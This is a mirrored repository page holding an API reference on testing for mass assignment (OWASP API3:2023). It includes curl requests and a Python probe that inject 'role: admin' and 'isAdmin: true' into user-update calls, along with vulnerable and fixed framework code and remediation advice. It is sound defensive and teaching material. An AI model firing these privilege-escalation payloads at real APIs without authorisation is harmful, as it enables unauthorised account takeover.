mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-06-12 14:14:56 +03:00
c21af3347e
- Add scripts/agent.py and references/api-reference.md to all remaining skills - Update all 648 LICENSE files: copyright now reads 'Mahipal' - Add implementing-security-monitoring-with-datadog (new skill with full anatomy) - All 649 skills now have: SKILL.md, LICENSE, scripts/agent.py, references/api-reference.md
2.4 KiB
# API Reference: Mass Assignment Vulnerability Testing

OWASP API3:2023 — Broken Object Property Level Authorization
## Description

The API accepts and processes request fields that should never be client-settable. An attacker adds extra properties (such as `role` or `isAdmin`) to an otherwise legitimate request, and the server binds them straight onto the object, changing server-side state that only privileged code should control.
## Common Vulnerable Fields

| Field | Impact |
|---|---|
| role / isAdmin | Privilege escalation |
| permissions | Authorization bypass |
| verified / email_verified | Account verification bypass |
| balance / credits | Financial manipulation |
| plan / subscription | Service tier elevation |
## Testing Methodology

### Step 1: Observe Normal Request

```bash
curl -X PUT https://api.target.com/users/me \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"name": "Test User"}'
```

### Step 2: Add Privilege Fields

```bash
curl -X PUT https://api.target.com/users/me \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"name": "Test User", "role": "admin", "isAdmin": true}'
```

### Step 3: Verify Changes

Re-read the resource rather than trusting the PUT response body; the field is only confirmed as accepted if the stored value changed.

```bash
curl https://api.target.com/users/me -H "Authorization: Bearer $TOKEN"
```
## Python Testing Script

```python
import os
import requests

# Endpoint under test and the bearer token; the token is read from the
# environment so the credential is not hard-coded in the script.
url = "https://api.target.com/users/me"
headers = {"Authorization": f"Bearer {os.environ['TOKEN']}"}

base_payload = {"name": "Test"}
privilege_fields = {
    "role": "admin",
    "isAdmin": True,
    "permissions": ["*"],
}

# Probe one field per request so each result is attributable to a single property.
for field, value in privilege_fields.items():
    payload = {**base_payload, field: value}
    resp = requests.put(url, json=payload, headers=headers)
    # A 200 whose body echoes the field name suggests the server processed it;
    # confirm with a follow-up GET (Step 3) before reporting, since some APIs
    # echo the request back unchanged.
    if resp.status_code == 200 and field in resp.text:
        print(f"VULNERABLE: {field} accepted")
```
## Framework-Specific Vulnerabilities

### Ruby on Rails

```ruby
# Vulnerable: binds every key in params[:user] onto the model
User.new(params[:user])

# Fixed: strong parameters allowlist only the client-settable attributes
User.new(params.require(:user).permit(:name, :email))
```

### Node.js/Express

```javascript
// Vulnerable: the whole request body becomes the update document
User.findByIdAndUpdate(id, req.body)

// Fixed: destructure only the allowed fields and pass nothing else
const { name, email } = req.body;
User.findByIdAndUpdate(id, { name, email })
```

### Django REST Framework

```python
from rest_framework import serializers

from .models import User


# Vulnerable: all fields writable, including role and is_admin
class UserSerializer(serializers.ModelSerializer):
    class Meta:
        model = User
        fields = '__all__'


# Fixed: explicit fields
class UserSerializer(serializers.ModelSerializer):
    class Meta:
        model = User
        fields = ['name', 'email']
        # read_only_fields only affects names that also appear in `fields`;
        # add role/is_admin to `fields` if they should be returned but never written.
        read_only_fields = ['role', 'is_admin']
```
## Remediation

- Use allowlists for acceptable fields (never blocklists)
- Implement read-only fields for sensitive properties
- Use separate DTOs for input and output
- Validate request schema against OpenAPI spec
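The following is an added, framework-independent example that is not part of the original skill: it puts the merge-everything handler the page warns about beside an allowlist handler that implements the first three remediation points (allowlist, read-only properties, separate output DTO), then runs the per-field probe from the Testing Methodology against both, comparing stored state before and after instead of grepping the response text. The `User` record, the field sets and the `UpdateRejected` error are constructed for this illustration.

```python
"""Vulnerable merge vs. allowlisted update, with a state-diff probe for each privilege field."""
from dataclasses import asdict, dataclass
from dataclasses import field as dc_field


# Constructed sample record; hypothetical, not from any real system.
@dataclass
class User:
    name: str
    email: str
    role: str = "user"
    is_admin: bool = False
    permissions: list = dc_field(default_factory=list)


# Allowlist: the only properties a client may set on /users/me.
CLIENT_SETTABLE = frozenset({"name", "email"})
# Server-managed properties that exist on the object but are never client input.
READ_ONLY = frozenset({"role", "is_admin", "permissions"})

# Constructed privilege fields, mirroring the ones the testing script probes.
PRIVILEGE_FIELDS = {"role": "admin", "is_admin": True, "permissions": ["*"]}


class UpdateRejected(ValueError):
    """Raised (maps to HTTP 400) when the body carries a field outside the allowlist."""


def vulnerable_update(user: User, body: dict) -> User:
    """Binds every key in the request body onto the model: the mass-assignment pattern."""
    for key, value in body.items():
        setattr(user, key, value)
    return user


def hardened_update(user: User, body: dict) -> User:
    """Applies only allowlisted keys and fails closed on anything else.

    Rejecting (rather than silently stripping) unknown keys means a probe
    like the one on this page shows up as a 400 in the logs.
    """
    unexpected = set(body) - CLIENT_SETTABLE
    if unexpected:
        raise UpdateRejected(f"fields not permitted: {sorted(unexpected)}")
    for key in CLIENT_SETTABLE & set(body):
        setattr(user, key, body[key])
    return user


def to_output_dto(user: User) -> dict:
    """Separate output DTO: role is exposed for reading but is never an input field."""
    return {"name": user.name, "email": user.email, "role": user.role}


def probe(handler, privilege_fields: dict) -> dict:
    """Per field, report whether the handler let the client change stored state.

    A fresh record is used for each field so results are attributable to one
    property, and the verdict comes from diffing the object, not the response.
    """
    results = {}
    for field_name, value in privilege_fields.items():
        user = User(name="Test User", email="test@example.invalid")
        before = asdict(user)
        try:
            handler(user, {"name": "Test User", field_name: value})
        except UpdateRejected:
            results[field_name] = False
            continue
        results[field_name] = asdict(user).get(field_name) != before.get(field_name)
    return results


if __name__ == "__main__":
    print("vulnerable:", probe(vulnerable_update, PRIVILEGE_FIELDS))
    print("hardened:  ", probe(hardened_update, PRIVILEGE_FIELDS))
```

Running it reports every privilege field as changed under `vulnerable_update` and none under `hardened_update`, while a legitimate `{"name": ...}` update still succeeds. Validating the body against the OpenAPI schema with `additionalProperties: false` gives the same fail-closed behaviour one layer earlier, before the handler runs.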